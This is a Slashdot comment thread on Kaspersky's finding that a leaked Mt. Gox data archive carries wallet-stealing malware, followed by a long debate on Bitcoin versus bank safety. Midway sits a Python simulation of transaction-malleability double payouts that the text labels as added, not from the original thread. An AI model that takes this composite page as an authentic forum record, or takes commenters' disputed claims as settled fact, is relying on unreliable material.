Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware

Posted by Unknown Lamer
from the trusting-random-zip-files-considered-harmful dept.
itwbennett writes "An archive containing transaction records from Mt. Gox that was released on the Internet last week also contains bitcoin-stealing malware for Windows and Mac, say researchers at Kaspersky Lab who have analyzed the 620MB file called MtGox2014Leak.zip. The files masquerade as Windows and Mac versions of a custom, back-office application for accessing the transaction database of Mt. Gox. However, they are actually malware programs designed to search and steal Bitcoin wallet files from computers, Kaspersky security researcher Sergey Lozhkin said Friday in a blog post."

  • Really? (Score:4, Funny)

    by SternisheFan (2529412) on Monday March 17, 2014 @08:08PM (#46512109)
    Oh yes, I totally trust easily manipulated computer bits over paper money.
    • Re:Really? (Score:4, Interesting)

      by Anonymous Coward on Monday March 17, 2014 @08:13PM (#46512149)

      ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

      • ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

        Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency. Out of the gate, their track record sucks so far. Reliable? I'd trust my 3rd cousin Wilfred to pay me back first.

        • by Anonymous Coward

          Well, except that none of the bitcoin "problems" or exploits have been with bitcoin itself. It's always some 3rd party poorly coded bullshit software (eg. exchanges, pools, online wallets, etc).

          So far no one has managed to exploit bitcoin itself.

          • Re:Really? (Score:4, Interesting)

            by SternisheFan (2529412) on Monday March 17, 2014 @08:35PM (#46512285)
            Does it really matter 'how' it happened? People are out of money, big time money. Bitcoin has not proven itself to be a reliable way to store money. Blame whatever you wish to. It is not secure to place my money in. And now Bitcoin will have to overcome the "once burned, twice shy" hurdle.
            • by Anonymous Coward

              Bit coin is reliable. The shitty exchanges are not.
              If you have someone access to your paper wallet then the effect would be the same.

              • Mt Gox, thee top exchange for turning bitcoins into coin of the realm,

                turned out to be a house of phosphorous cards,

                and you don't see a red flag waving?

                Was your retirement locked up in there and now you find yourself too poor to pay attention?

              • Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

                Why compare to paper? If I have bitcoin stealing malware on my computer (and there is like 150 variants of that in the wild) it will get the bitcoin even if I keep my wallet offline and encrypted, because I have to access it sometime. But, it won't get my online banking money, because they use a challenge-response protocol. Very different.

              • Re: Really? (Score:5, Insightful)

                by mlts (1038732) on Monday March 17, 2014 @11:32PM (#46513251)

                BitCoin exchanges are where banks were, pre-Great Depression. They go under, you lose your savings, period. It was only under FDR that bank losses were covered by the US government under FSLIC/FDIC/NCUA insurance.

                The BitCoin protocol has not had any attacks. It has been exchanges that were poorly run or attacks on the computers/endpoints storing BitCoin wallets. The BitCoin core protocol has proven to be secure, although there is always concern about one single party reaching the magic 51% mark.

              • Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

                Except nobody's paper wallet is connected to the internet, and few people carry significant hoards of cash in their wallet anyway so this isn't really a fantastic comparison. Yes, one could say, "well you can move it offgrid" then you can also do the same thing with your wallet and toss it in a safe or bank security box, only then would they become equals?

                That being said, your wallet is anything but a "safe" place but I'd still say a networked computer is worse. Bitcoins on a networked computer would b

            • by mysidia (191772)

              Bitcoin has not proven itself to be a reliable way to store money.

              Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

              Also... if you deposit them in an investment firm who is not FDIC insured, and they go bankrupt, you might lose them all, just like with Gox.

              Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?

              • Re:Really? (Score:5, Insightful)

                by QilessQi (2044624) on Monday March 17, 2014 @09:37PM (#46512661)

                And yet, people are able to go to credit card companies and banks, dispute the fraudulent transactions, and get the money back. Because our commerce systems have evolved to cope with the reality of fraud and, consequentially, the necessity of insuring deposits through mechanisms like FDIC.

                Like it or not, the Mt.Gox fiasco demonstrates that Bitcoin is not yet ready to serve as a desirable system of currency for the masses. For all the talk about the transparency of the blockchain, no one has been able to restore those stolen coins to the hands of their rightful owners.

                Maybe someday people will be able to say, "thank God I used cryptocurrency for those transactions!". But that day is not today.

                • by Agent0013 (828350)

                  I'm not trying to say Bitcoin is the answer. It does appear to be the exchanges that are having problems and not the currency itself though.

                  The real point I want to make is that FDIC insurance has a limit. So if a bank goes under and loses all the money of the people that have put their money into that bank, each account only gets back $250,000. So people who have millions of dollars in the bank will lose out just the same as people who left their Bitcoins in Mt Gox. And in the FDIC case it is all legal, s

                  • by QilessQi (2044624)

                    Good point, which is why it's a good idea to diversify your assets among multiple banks and multiple account types at each bank (e.g., $250K in Savings, $250K in an IRA, etc.): in that manner you can have far more than $250K secured by FDIC. I'll wager that most Americans don't hit that $250K limit, and the ones who are way above it have other ways of securing their portfolio against disaster. For example, you can insure your retirement funds independently.

                    Now consider, why was FDIC brought into existence

            • Actually, yes, it does matter. That's like saying "online banking is insecure" when in fact pretty much all exploits on online banking (at least in Europe) worked only due to negligence on the user's side. I know of not a single case where it was actually the bank's fault. And trust me, there are FAR, FAR more cases than you'll ever hear about (banks tend to pay, i.e. take over the cost for the users' idiocy to hush it up).

            • Yes. The 'how' is very important.

              If a plane suddenly crashes mid-flight, and I'm due to fly on that same model next week, I'd be concerned. If the crash was due to a fundamental flaw in the fuselage, I'm cancelling my flight. If it turns out the crash was due to the plane flying over rebel-held lands and being shot by a missile, my concern about my flight from Maryland to Vermont is greatly reduced.

          • Re:Really? (Score:5, Insightful)

            by QilessQi (2044624) on Monday March 17, 2014 @09:27PM (#46512607)

            As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result. But let's leave that aside for a minute:

            The real problem is that people have been able to exploit the Bitcoin ecosystem, which does not yet have the resilience to deal with the way human beings expect to be able to work with money.

            If you want to create a currency for everyone, then that currency has to be simple and secure even for new adopters. Part of creating a good system (of any sort) is shielding users from serious consequences. If someone in another state charges $3000 to my credit card to buy pharmaceuticals, I'll get a call. If a legitimate vendor charges my card but fails to deliver the promised goods, Visa or MasterCard will give me my money back after one phone call and a followup letter. If my bank is robbed, my deposits are FDIC insured.

            Bitcoin enthusiasts are describing exchanges as being "just like banks", and then blaming the users for treating them like banks and keeping their coins there. Instead of castigating folks for not solely printing their wallets out on computers that have been rebooted while disconnected from the Internet for that express purpose, maybe the Bitcoin community could take a step back and find a way to make the entire ecosystem more human-proof.

            • Re:Really? (Score:4, Interesting)

              by ras (84108) on Tuesday March 18, 2014 @02:20AM (#46513857)

              As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result.

              Your understanding is wrong. The mtgox fiasco didn't occur because the miners accepted malleable transactions. It happened when the miners stopped accepting transactions that were malleable. Well, not all malleable transactions. But they did stop accepting the invalid transactions mtgox was generating. Generating those invalid transactions was mtgox bug 1. Mtgox bug 2 was when people fixed their bad formatting and they were accepted into the block chain, mtgox software didn't recognise them. Mtgox bug 3 was that they then repeated the same transaction without doing a full audit of their ledger to verify some other mistake hadn't been made. Doing it twice is a bit of a risk given bitcoin transactions aren't reversible. But to be fair, mtgox said they authorised such double spends manually.

              But ... it is almost inconceivable that a human authorised $350M in double spends without getting suspicious. So that brings us to the unknown mtgox bug 4. Somehow, they managed to figure out a way of authorising $350M in double spends without anybody noticing. Surely this must qualify for the Guinness Book of Records greatest accounting cluster fuck of all time.

              But bitcoin protocol bug - sorry no, not this time. Bitcoin offers very few guarantees. I guess a known mining rate, whatever appears on the audit trail is the one and only correct history of bitcoin, and that history will never change are the main three. In the early days, back when people sent 1000's of bitcoins to pay for a pizza, there were bugs in the bitcoin software that meant those guarantees weren't upheld. But it was also a nicer time. It was when bitcoin was just a toy friends played with, so such mistakes could be and were always fixed. No bitcoin has ever been permanently lost because of such bugs.

              I know I shouldn't care when a person on the internet is wrong. Not just a little bit wrong, but tinfoil hat type wrong as you are in this case. But seeing tinfoil hat comments being modded up to +5 is difficult to swallow silently.
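
The failure mode described in the comment above (a withdrawal system that stops recognising its own transaction once the signature bytes have been re-encoded, then pays again), as an added example that is not part of the original thread or any exchange's code. It uses a simplified transaction model, not Bitcoin's wire format, with constructed sample data and hypothetical names, and compares reconciliation keyed on the transaction ID with reconciliation keyed on a hash that leaves the signature bytes out.

```python
import hashlib
import json
from dataclasses import dataclass, replace


def sha256d(data: bytes) -> str:
    """Double SHA-256, hex encoded."""
    return hashlib.sha256(hashlib.sha256(data).digest()).hexdigest()


@dataclass(frozen=True)
class TxIn:
    prev_txid: str     # transaction whose output is being spent
    prev_index: int    # which output of that transaction
    script_sig: bytes  # signature data; the signature does not cover these bytes


@dataclass(frozen=True)
class Tx:
    inputs: tuple      # tuple of TxIn
    outputs: tuple     # tuple of (address, amount) pairs


def serialize(tx: Tx, include_sigs: bool) -> bytes:
    # Simplified stand-in for a wire format (assumption, not Bitcoin's encoding).
    ins = [[i.prev_txid, i.prev_index, i.script_sig.hex() if include_sigs else ""]
           for i in tx.inputs]
    return json.dumps({"in": ins, "out": [list(o) for o in tx.outputs]}).encode()


def txid(tx: Tx) -> str:
    """ID over the whole transaction, signature bytes included."""
    return sha256d(serialize(tx, include_sigs=True))


def normalized_id(tx: Tx) -> str:
    """ID over what was spent and who was paid, signature bytes excluded."""
    return sha256d(serialize(tx, include_sigs=False))


def reconcile(pending: dict, confirmed_txs: list, key):
    """Split pending withdrawals into (confirmed, missing) using `key` as the ID."""
    seen = {key(tx) for tx in confirmed_txs}
    done = sorted(w for w, tx in pending.items() if key(tx) in seen)
    missing = sorted(w for w, tx in pending.items() if key(tx) not in seen)
    return done, missing


def inputs_already_spent(tx: Tx, confirmed_txs: list) -> bool:
    """Audit before re-issuing: has any input of `tx` been spent on chain?"""
    spent = {(i.prev_txid, i.prev_index) for c in confirmed_txs for i in c.inputs}
    return any((i.prev_txid, i.prev_index) in spent for i in tx.inputs)


# --- constructed sample data -------------------------------------------------
SIG = b"constructed-signature-bytes"
ORIGINAL = Tx((TxIn("aa" * 32, 0, SIG),), (("customer-address", 150_000_000),))
# Same spend, same payee; only the signature bytes are encoded differently.
# The extra leading byte is a stand-in for an alternative valid encoding.
MUTATED = Tx((replace(ORIGINAL.inputs[0], script_sig=b"\x00" + SIG),),
             ORIGINAL.outputs)
UNSENT = Tx((TxIn("bb" * 32, 1, SIG),), (("other-address", 20_000_000),))

PENDING = {"W1": ORIGINAL, "W2": UNSENT}  # what the withdrawal system broadcast
CHAIN = [MUTATED]                         # what actually got confirmed

if __name__ == "__main__":
    print("txid changed:      ", txid(ORIGINAL) != txid(MUTATED))
    print("normalized id same:", normalized_id(ORIGINAL) == normalized_id(MUTATED))
    print("by txid:           ", reconcile(PENDING, CHAIN, txid))
    print("by normalized id:  ", reconcile(PENDING, CHAIN, normalized_id))
    print("W1 inputs spent:   ", inputs_already_spent(ORIGINAL, CHAIN))
```

Keyed on `txid`, W1 looks unpaid even though its inputs are already spent on chain; either the signature-independent ID or the spent-input audit catches that before a second payment goes out.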

              • by bentcd (690786)

                (...) But to be fair, mtgox said they authorised such double spends manually.

                Did this manual process by any chance involve a "Yes To All" button?

              • by QilessQi (2044624)

                Not so fast, Ras. I said that transaction malleability was exploited by hackers; it was. My only error was confusing the Mt.Gox incident with the Silk Road 2 incident. Here, from the very first paragraph of this Tech Crunch article ( http://techcrunch.com/2014/02/... [techcrunch.com] )

                Silk Road 2 moderator Defcon reported in a forum post that hackers have used a transaction malleability exploit to hack the marketplace. The hackers stole over 88,000 4474.26 bitcoins worth $2,747,000, emptying the site’s escrow accoun

                • by ras (84108)

                  I said that transaction malleability was exploited by hackers; it was.

                  I thought I was pretty clear when I said it wasn't.

                  The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited.

                  Again no, as far as I know it was never exploited. But I can see you prefer to believe an internet echo chamber confirming your world views over me, who is saying you are just plain wrong. More on the dangers of doing that later. For now I assume you really are willing to discard your tin foil hat if you understood what happened. Unfortunately that is going to require going into some detail.

                  The transaction malleability problem we are discussing

          • Um, actually there has been a problem with bitcoin itself with a forked chain causing double spend issues http://www.reddit.com/r/Bitcoi... [reddit.com]
          • Right, and when people say "Oh, that was a computer error" when a computer doesn't give them the answers they want, they're wrong too, it's actually something wrong with how the computer was programmed.

            Or, maybe, perhaps, just maybe, when people say "Bitcoin" they mean "The system associated with Bitcoin", which right now is intentionally unregulated, intentionally over-automated, intentionally unreversable, has not addressed banking because of ideological considerations despite widespread use of Bitcoin

        • Re: (Score:3, Funny)

          by zieroh (307208)

          Real coin has worked for thousands of years.

          Yeah. And over those thousands of years, real coins have proved impervious to all manner of theft.

          • ... has been going on for almost as long as coinage itself. One of the advantages of paper money (in addition to weight, lower manufacturing cost, etc.) is that it can be harder to forge. Any shmuck with a press can create coins that are hard to distinguish from the real thing. On a larger scale, one of the big problems today with gold is people hollowing out gold bars and filling them with tungsten, or starting with tungsten and wrapping a small amount of gold. These are indistinguishable from the real

        • Re: (Score:3, Insightful)

          by mysidia (191772)

          Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency.

          Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything. The fed and the banks just will "federal reserve" monopoly bucks into existence.

          When you go to a store, and swipe your credit card.... you think those are "real coins" you are paying with??

          NOPE! And I assure you, this mode of payment is not thousands of years old.

          For every one of your dollars you put in the bank,

          • Re:Really? (Score:4, Informative)

            by sphealey (2855) on Monday March 17, 2014 @09:15PM (#46512503)

            - - - - - - NOPE! And I assure you, this mode of payment is not thousands of years old. - - - - - -

            Another cryptocoin fanatic who hasn't bothered to read a detailed history of money, much less a standard theory of money textbook. Hint: more than one ancient language has been deciphered by translating magic documents known as "letters of credit".

            sPh

          • Re:Really? (Score:4, Insightful)

            by mbkennel (97636) on Monday March 17, 2014 @09:20PM (#46512533)
            | Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

            Other than the collective agreement and binding contracts by the most powerful governments and private individuals on Earth, and a deep market for liquid and tradable property as well as productive real property.

            Fiat currency is not "by fiat" automatically exchangeable for a certain quantity of a certain kind of property with no market fluctuation allowed. But that doesn't mean it's not 'backed' by anything.

            Bitcoin isn't by fiat exchangeable for anything either---it only has constructed scarcity.

            | The fed and the banks just will "federal reserve" monopoly bucks into existence.

            Not quite "at will" but in specific economic & financial circumstances deemed to be legal and essential parts of commerce & business.
          • by TubeSteak (669689)

            Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

            And once we introduced central banking, fiat has worked out a lot better than "real coin" did before we abandoned it.
            I've yet to hear a satisfactory response to the basic question of why we should go back to a deflationary currency like gold.
            If you're feeling especially pugnacious, feel free to explain how we'd go about re-implementing [gold] while avoiding the problems of its past and fixing the actual (and perceived) problems of the present.

          • by Chas (5144)

            Yet you can go to your bank any time and be guaranteed payout in real dollars.
            And you have near-zero chance of being screwed over the way these people are by collapsing exchanges.
            How likely is it that the US (and thus FDIC) are going to collapse tomorrow, or next week, or a year from now? Maybe there's a chance of it happening, but your chance of getting hit by lightning while simultaneously winning the lottery is better.
            How likely is it that one or more of these exchanges is going to fold up and disappear

            • by sfcat (872532)
              Right, cause this never happened...in the last 12 months?

              http://www.bbc.com/news/busine... [bbc.com]

              Look, people are involved and people are fallible and technology can't really prevent that. BTC as a protocol is solid and wasn't compromised. The very immature institutions that have sprung up around BTC are currently failing at their task that you have every right to criticize them. Hopefully the market will sort out some winners that can function in their institutional roles in the BTC ecosystem safely and secu

              • by Chas (5144)

                And a ponzi scheme always needs an increasing amount of money to keep going (ie next year more $$ needs to go in than last year). That doesn't seem to be a feature of the Bitcoin ecosystem.

                Really? Currently you have a virtually generated currency system that hasn't reached its maximum number of coins generated.

                So yes, you have an increasing number of BTC coming into the system.

                You also have all these sucker^H^H^H^interested individuals helping to bloat the "value" of BTC in the short term.

                Plus sideline of space heater (BTC mining rig) sales.

                And remember that ponzi schemes always, eventually, crash. As they eventually run into a situation where people inevitably want to cash out faster than

          • by gmhowell (26755)

            Did you have a point to your rant?

        • by TheCarp (96830)

          Yes, because real coins have never been stolen. If it ever happened we might need to invent a new term like....bank robbery or something.

          You are aware, I would hope, that the GP's point was that real banks use digital ledgers too, and in fact do not keep most of their money in "Real coin" at all. Not only that but, using whatever manner works to steal real coin, including by the use of malware to cause changes in digitally stored ledgers, is actually a way your precious real coin gets stolen now.

          There is even

      • Re:Really? (Score:5, Informative)

        by ttucker (2884057) on Monday March 17, 2014 @08:24PM (#46512225)

        ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

        This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

        • Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

          The blockchain transactions aren't reversible, but neither are bank ledger transactions. At the customer service level, both can be refunded (even when it's a bad idea: see Mt. Gox). It's like like in USD's you're going to get the same bills back, but that's why currency is fungible.

        • by mysidia (191772)

          no bitcoin transactions are ever reversible.

          No cash transactions are ever reversible.

          [And Bitcoin is a form of cash.]
          There, fixed it for you.

          • No cash transactions are ever reversible.

            They are if you keep the receipt.

            • Only if the merchant or whoever you concluded the transaction with agrees to reverse it and even then, the refund is still a separate transaction from the original payment.

              A crook can give you a "receipt" and vanish from your life or make excuses to refuse refunds just about as easily with real cash as Bitcoins.

              The main differences are that Bitcoin is mostly used in higher-risk transactions and does not have any legal protections anywhere so if you get screwed, you have little if any legal protection.

          • by ttucker (2884057)
            Nobody has ever stolen my cash by making a copy of it. My cash has never been stolen from a computer hard drive. I agree, BitCoin is a bearer instrument like cash. That said, you must admit that there are striking differences, and that there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.
            • by mysidia (191772)

              Nobody has ever stolen my cash by making a copy of it.

              And nobody has ever stolen any of my bitcoins by picking my pocket.

              In fact... they couldn't. They'd need my security codes to unlock my private key. Just like they'd need my ATM PIN number to go steal cash out my bank account.

              there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.

              There is no requirement to keep your private key on a computer.

              You can have a large number of paper wal

        • Re:Really? (Score:4, Informative)

          by Kjella (173770) on Monday March 17, 2014 @09:15PM (#46512505)

          This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

          That's generally false [bbb.org] for wire transfers. Even if you don't do a wire transfer chances are they have some sort of money mule who'll wire the money to Nigeria and that's the last you'll see of them. The mule is of course a hobo or something with no assets to seize. In general if the receiving bank has accepted the money, it's gone. I see a few people saying you should be able to reverse one within 72 hours, but in practice I don't see anybody saying they've actually successfully reversed such a scam.

          • by ttucker (2884057)
            This is a good point, some wire transfers are irreversible... it is exactly the purpose of the money mule scheme. To initiate a wire transfer, the customer interaction required at a bank is comparable to that which is required to withdraw cash. The secrets required to do this are much less frequently available in a computer to a hacker than say, a credit card number and CCV. If wire transfers were easy, there would be no need for a money mule.

            In the case of the money mule scam, the person who initia
        • by ras (84108)

          This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

          Only for some definition of "totally" that does mean 100% of transactions. And when you get to the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

          From http://www.globalgrainsvn.com/GGS/MT103.html [globalgrainsvn.com]:

          SWIFT MT-103

          SWIFT MT-103s are the most commonly used form of SWIFT communication, and one which many people will have utilized without even knowing it. For most bank customers, they are known not as MT-103s at all, but rather as wire transfers, telegraphic transfers, or SWIFT transfers. A SWIFT MT-103 is used by the bank when its customers wish to make payment to customers of another bank in another country.

          How Do I Send A MT-103 ?

          An MT-103 is the most commonly utilized type of SWIFT message. In order to send one, simply contact your bank and let them know that you would like to send a telegraphic or wire transfer. They will require the recipient’s bank details, and also the SWIFT code of the recipient’s bank. If the recipient is not aware of their bank’s SWIFT code, it is a fairly simple matter for the recipient to inquire at their bank.

          Are MT-103s Reversible?

          No. Once a MT-103 has been made, it is not reversible. Sending a MT-103 is the equivalent of handing someone cash in many respects, so due care should be taken when initiating a MT-103.

          • And when you get to the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

            Oh, really? That's what Bitcoin's meant for? Well, couldn't that have been cleared up from the beginning! I honestly read a lot of Bitcoin's advocates as claiming that Bitcoin was intended to be some kind of decentralized universal currency intended for any transaction type, from tipping Redditor whose comments you like to buying Tesla cars. But if it's actually just inte

          • by ttucker (2884057)
            While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.
            • by ras (84108)

              While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.

              Yes. But this is only because the banks can and do make mistakes, signatures can be forged and so on. One of the fundamentals bitcoin is built on is it never makes a mistake like that. Every addition to the block chain is checked by every miner, so if some random miner suffers a bit error in RAM, it will be rejected by the network. The whim part is taken care of by requiring the customer to sign the transaction using a digital signature. It can't be forged. Either the customer authorised the transacti

              • Except that not every bitcoin transaction is made by the owner. There are exploits for that. It seems disingenuous to refer to bitcoin as not having mistakes when it is possible for some people to make fraudulent transactions.

                Ah, I see that "the equivalent of giving away their banking password" is rearing its head here. Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line. Computer security is far from what it wou

                • by ras (84108)

                  Except that not every bitcoin transaction is made by the owner.

                  I am not sure what you mean. Every spend of your bitcoins has to be signed by your private key. It doesn't have to be submitted by you, but it must be authorised by you by that signature.

                  Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line.

                  Hmmm. What do you think bitcoin is good for? Do you think it is the equivalent of storing your life's savings under a mattress, or doing transactions?

                  You can use it to do either. The mattress scenario is easy enough. You just print your private keys out a few times on a piece of paper, and put them in safe deposit box

      • Re:Really? (Score:5, Insightful)

        by Ralph Wiggam (22354) on Monday March 17, 2014 @08:24PM (#46512227)

        How often does someone break into a bank vault? Almost never. When someone "robs a bank" they're just taking a couple thousand bucks from a teller drawer, which is negligible.

        When someone steals real money from a bank, it is insured by the FDIC.

        The impact is way, way worse with bitcoin.

        • by DarkOx (621550)

          Except Mt.Gox was never a bank, if anything it's more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered somehow by authorities.

          • by wallsg (58203)

            Except Mt.Gox was never a bank, if anything it's more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered somehow by authorities.

            Incorrect. SIPC (Securities Investor Protection Corporation) insurance protects cash up to $250,000 and cash and securities up to $500,000 per account. Most brokerage firms carry additional insurance, usually called "excess SIPC coverage".

            Mt. Gox was the tavern bookie that you left your winnings with, with no insurance or regulation at all.

            • by Atzanteol (99067)

              Which is what needs to be remembered in all of these bitcoin discussions. If I gave cash to "some guy" and he stole it nobody would be saying "well you just can't trust paper currency!" They'd be saying "why the fsck did you give your money to 'some guy'?"

          • by wallsg (58203)

            And I totally agree with your signature calling for the repeal of the 17th Amendment.

          • Except Mt.Gox was never a bank,

            Yet somehow they possessed 6% of all the bitcoins in existence.

        • Re:Really? (Score:4, Informative)

          by mysidia (191772) on Monday March 17, 2014 @09:19PM (#46512527)

          When someone steals real money from a bank, it is insured by the FDIC.

          Actually.... loss due to fraud, theft, or accounting errors, are the iconic examples of a bank loss that IS NOT FDIC covered.

          FDIC insures the funds against the bank losing the money through the ordinary course of business (market risks -- such as the risk of borrowers defaulting on the loan, and the bank, therefore losing the principal required to cover their obligations to depositors).

          WP has some other examples [wikipedia.org] of items not insured by the FDIC, also not covered:

          Investments backed by the U.S. government, such as US Treasury securities

          The contents of safe deposit boxes. -- Even though the word deposit appears in the name, under federal law a safe deposit box is not a deposit account – it is merely a secured storage space rented by an institution to a customer.

          Losses due to theft or fraud at the institution. These situations are often covered by special insurance policies that banking institutions buy from private insurance companies.

          Accounting errors. In these situations, there may be remedies for consumers under state contract law, the Uniform Commercial Code, and some federal regulations, depending on the type of transaction.

          Insurance and annuity products, such as life, auto and homeowner's insurance.

          • by hendrips (2722525)

            While you are absolutely correct that none of these types of losses are covered by FDIC insurance, they are all covered by some kind of insurance. Your own post mentions that losses from fraud and theft are covered by special private liability insurance. Treasury bonds are backed by the full faith and credit of the U.S. government. Insurance and annuities are almost always insured by the state that the bank is operating in, usually up to somewhere between $250k and $500k. So his point is still valid - p

            • by mysidia (191772)

              they are all covered by some kind of insurance.

              You are probably covered by a special policy with a private insurance company [* Although in the event of massive theft insurance company may be found insolvent, policy may not actually exist, or the situation may have voided coverage], is a HECK of a lot different than, Your deposit is guaranteed by the FDIC, backed up by the full faith and credit of the US government.

        • For the most recent year in which statistics have been published (2011), 5,086 times, resulting in a loss of $38,343,501.96, only $8,070,886.97 was ever recovered.

          http://www.fbi.gov/stats-servi... [fbi.gov]

          • by swb (14022)

            Does this prove the grandparent's point, though?

            The average take is only $7,539.02.

            Even though only 20% is recovered, the clearance rate for bank robberies is like 60%. This says to me that the amounts taken are so small that even if you ultimately get caught, the amount stolen is small enough that a lot of it gets spent quickly before the robbers are caught. It doesn't seem likely that most bank robbers are doing 20 year Federal prison sentences to recover a haul of $7500 when they get out.

        • by ras (84108)

          How often does someone break into a bank vault? ... The impact is way, way worse with bitcoin.

          How do you know? It has never happened. There is only one bitcoin banker - it's the miners. There is only one bank statement issued by those bankers, and that's the block chain. So far the miners have never lost a bitcoin. You can verify that yourself. The block chain is a public document. I think it's fair to say bitcoin is built on the fact that they never will. It's a pretty safe bet, because if the bitcoin software adheres to the protocol description, mathematically, they never can.

          If you give

          • But your fantasy of the vault all bitcoin is stored in being raided - that has never happened.

            6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

            • by ras (84108)

              6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

              True. But what does that have to do with someone breaking into a bank vault? Mtgox isn't a bank. They are a broker - they buy and sell bitcoins. Some people gave them bitcoins to sell, but they lost them (by double spending them) instead.

              As I said elsewhere in this thread, here we have yet another example of someone who doesn't have a clue about what bitcoin is or how it operates, making a comment demonstrating his ignorance in spades and that comment modded to +5.

      • by exomondo (1725132)

        ...except this was no different from someone doing the same thing to a bank.

        It's totally different! Unlike a normal bank bitcoin transactions are irreversible, untraceable and the deposits are uninsured, the whole thing is unregulated and anonymous by design.

      • by beelsebob (529313)

        Right... because this happens so often with banks. We see a bank go pop, and everyone's money disappear every month or so, don't we.

        And you know... the government doesn't insure money held in bank accounts. It's completely the same.

        • Between 2008 and 2012, 465 separate US banks failed:

          http://en.wikipedia.org/wiki/L... [wikipedia.org]

          • And if you read the article you linked to, you'll realize that people's deposits didn't just disappear, even when the banks failed.

            • The fact someone showed up later to replace the money doesn't change the fact that the money disappeared. And the FDIC doesn't cover money lost due to theft or fraud. How about people who invested with people like Bernie Madoff?

              • People who invested with Madoff knew he was a criminal. They just thought he was their criminal. Fuck them. Same as people who left bitcoin in MtGox.

                A fool and his money were lucky to get together in the first place.

      • by Camael (1048726) on Monday March 17, 2014 @11:02PM (#46513085)

        ...except this was no different from someone doing the same thing to a bank. Your argument is invalid

        Except that the current banking system has failsafes to protect the depositor, even if the bank is at risk. For those who still use it, bank books and pass books record how much is in your bank account. Ditto for the monthly statements sent to depositors who have an electronic account, which is a hard copy in your hand. In many jurisdictions, these are legal evidence of a debt owed by the bank to you. Most banks are insured, both privately and by their respective governments.

        If you are just a normal depositor stashing your cash in a bank account, you are much more likely to recover something in the event a bank is (electronically) robbed. Take for example the relatively recent collapse of Barings Bank [numa.com] - according to the Bank Of England Report on the Collapse of Barings, the interests of depositors and creditors were still protected although the bank was closed. Compare this with the uncertain fate of the Bitcoin depositors of Mt. Gox which just recently filed for bankruptcy.

        The truth is that depositing funds in Bitcoins right now involves taking a substantial risk which is much higher than putting it into the current banking system. Deluding uninformed investors that investing in Bitcoins is "no different" from putting it in a bank is untrue and is likely to greatly harm the Bitcoin cause once these investors are burnt.

    • by Kris_J (10111) *
      • These are not "easily manipulated", they are cryptographically secure.
      • There is zero counterfeit bitcoin. You can't say the same about paper currency.
      • This isn't about the security of bitcoin, it's about phishing and trojans.
      • There is zero counterfeit bitcoin. You can't say the same about paper currency.

        Technically correct, since bitcoin does not exist in physical form and therefore cannot be counterfeited in physical form.

        But can transactions involving bitcoins be counterfeited? Most certainly! [arstechnica.com]

        Mt. Gox, Bitstamp, and other Bitcoin exchanges have temporarily suspended withdrawal transactions after coming under a form of a denial-of-service attack that abuses weaknesses in the way they keep track of fund balances, a security expert said.

        Andreas M. Antonopoulos, chief security officer of digital wallet devel

    • by Anonymous Coward

      You think the money in your bank account is paper, and not easily manipulated computer bits? That's so cute.

    • Keep a paper bitcoin wallet. It's as simple as that.

      • Not sure why that was moderated as overrated. Just to be clear that was not a joke. If you create paper wallets, and store your bitcoins in them (in whatever denominations you like, I use 1 BTC per wallet), no virus or malware or some e-wallet getting hacked, can get to your bitcoins.

  • This is becoming comical to the point of absurdity.

  • by gustgr (695173) <rondina AT gmail DOT com> on Monday March 17, 2014 @08:09PM (#46512115) Homepage

    This was known minutes after the leak was released. You disappoint me, slashdot.

    • by gustgr (695173)

      Also, the MtGox2014Leak.zip file is 750672322 bytes. The trades.zip file is 622555932 bytes.

  • Leak (Score:5, Informative)

    by gustgr (695173) <rondina AT gmail DOT com> on Monday March 17, 2014 @08:11PM (#46512125) Homepage

    The leak is real, nonetheless. I found my balance and transactions there.

    • The data is publicly available.

    • by Kjella (173770)

      Of course, just like repacked cracks usually do provide you with working software - and a trojan/malware infection. Why would you want to fight negative comments and complaints that it's fake when you can deliver and turn your victims into willing advocates and distributors?

      • by gustgr (695173)

